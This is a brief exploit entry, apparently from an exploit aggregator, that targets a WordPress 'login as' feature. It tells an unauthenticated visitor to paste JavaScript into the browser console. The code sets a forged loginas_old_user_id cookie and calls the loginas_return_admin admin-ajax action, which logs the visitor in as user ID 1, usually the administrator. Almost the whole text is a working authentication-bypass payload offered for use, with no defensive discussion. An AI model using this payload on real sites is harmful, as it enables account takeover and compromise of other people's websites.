## https://sploitus.com/exploit?id=WPEX-ID:286D972D-7BDA-455C-A226-FD9CE5F925BD
Run the below command in the developer console of the web browser while being on the blog as an unauthenticated user, then reload the page to be logged in as the user with ID:
document.cookie = "loginas_old_user_id=1";
fetch("/wp-admin/admin-ajax.php?action=loginas_return_admin", {
"method": "GET",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));